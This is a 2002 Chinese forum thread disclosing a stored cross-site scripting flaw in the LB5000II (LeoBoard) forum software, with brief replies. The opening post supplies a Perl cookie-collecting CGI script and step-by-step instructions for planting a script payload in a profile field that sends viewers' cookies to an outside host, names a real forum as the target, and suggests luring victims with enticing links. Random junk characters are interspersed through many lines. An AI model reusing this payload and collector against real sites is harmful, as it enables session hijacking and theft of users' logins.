查看: 8627|回复: 3

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

[复制链接]
发表于 2002-6-6 11:05:22 | 显示全部楼层 |阅读模式
漏洞描述: ! G5 o1 b; u! q) L8 x; O5 O
  LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新 : v+ N* j- S- |
版本是LB5000II v20317b,可以http://www.leoboard.com下载。 * n9 U% A9 {+ G6 r
  其注册模块未过滤用户资料   最高学历:职业状况:等注册信息
0 F1 w# d! l3 v3 o1 e' n导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript>
+ J* V# v' J+ M$ y进行攻击,进一步可以通过某中方式收集。测试通过 & f- |' Q" ]. B/ H' o6 N8 ?# W
测试程序:
6 p- J1 ]6 q' X7 y, |+ `  参考漏洞描述。 $ n( r2 i4 I, ^; K/ q
解决方案: 4 Q1 q7 K3 e4 V
  对用户提交的资料进行过滤
) F  C; S5 k2 d   
6 h3 O7 e% s: C7 Y: S5 S; v2 p  }. ?8 G8 \2 [4 T
请在s8s8论坛访问
2 ?5 C" a% s, L$ ^  R7 P. {http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队 4 U! n' N3 ]+ B7 G% r  N4 X. P
那么你在s8s8.net 的cookie将被我所获取. # Y1 H: d# l; i5 q( M- z
#!/usr/bin/perl ! L5 H  O* q# B4 M
#leo.cgi ) G4 \; Q  P. }6 G% q: \1 y7 H
$url="http://www.s8s8.net";;   N6 i4 Q* r; ?
$method=$ENV{"REQUEST_METHOD"}; 8 r) U- m) `7 G) q/ _7 T: s
if(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};}
) Q  |* S; I; U, {: R( j, U6 Belse{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));} ; J+ g- |  i2 p, `5 n) Y& v1 u
$remote_addr=$ENV{"REMOTE_ADDR"};
+ w$ {: Y7 B% Z+ |7 m$buffer=~tr/+/ /; ) `1 z9 h' T1 W$ M5 u- t
$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg; / u8 E4 B; ?6 _+ d
$buffer=$buffer."|$remote_addr\n"; 1 r) v, V5 j  a& h7 q
open(FILE,">>leo.txt");
7 Q; v+ [$ A( }" Nprint FILE $buffer;
* T0 m. F+ Q: m$ ^0 G( ]( rclose(FILE);                       
9 \4 n" i) n; U4 L- ~( o' iprint "Location:$url\n\n"; ! W; \% U6 o& {* g5 e
上面是我的cookie收集脚本 / W1 S7 h- E# O2 c/ u( I
------------------------------------------------------------------------------ ' r" c+ D( P: a1 w; L$ p. m+ q
范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试 . O* t0 n$ ~- R9 w: P  I
用大刀队登陆s8s8论坛,编辑个人资料,
: K) F) ], O+ {& F) H! E7 D用记事本打开编辑网页
; H; U" h$ @- |% [  x4 m: O6 C<option value="中专">中专</option>  这一项改成 9 ^0 ?% A' c, e. p( T+ @8 \
<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?&#39;+documents.cookie)</s cript>">中专</option>   
& S% P6 g+ h" p& b8 ~* B8 e, B0 _2 I8 |9 e8 b+ o
编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data">
, Z5 |! }( j& }改为
2 g7 ]* k$ n* Y! Y( k9 h<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data"> % b/ k$ C* t$ [* W9 g
保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据, 8 U' B$ `( X' u3 Y* S5 Y7 n
这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。 , q2 C# X- D% }( Q/ x+ ]
为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击,
8 c. O/ z& C0 U6 e: u* A: ]3 k什么算诱惑力呢,自己发挥吧。
6 J! S/ |# ^% q$ d. X6 k# U: s$ x. V
发表于 2002-6-8 12:21:09 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我连怎么设置超连接都不懂~~~汗~!能教教我吗?
0 q4 B) ^7 Z6 k  p(我指在贴上设置)' f4 S' T9 l& b* V+ i' ^
发表于 2002-6-24 19:03:26 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我们的论坛虽然是使用这个程序!但没这个问题!5 r% x0 ^# L& W6 g) F6 s2 n
 楼主| 发表于 2002-6-25 11:25:20 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

那当染好了啊
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

相关侵权、举报、投诉及建议等,请发 E-mail:yesdong@qq.com

Powered by Discuz! X5.0 Licensed © 2001-2026 Discuz! Team.44152102000001

在本版发帖QQ客服返回顶部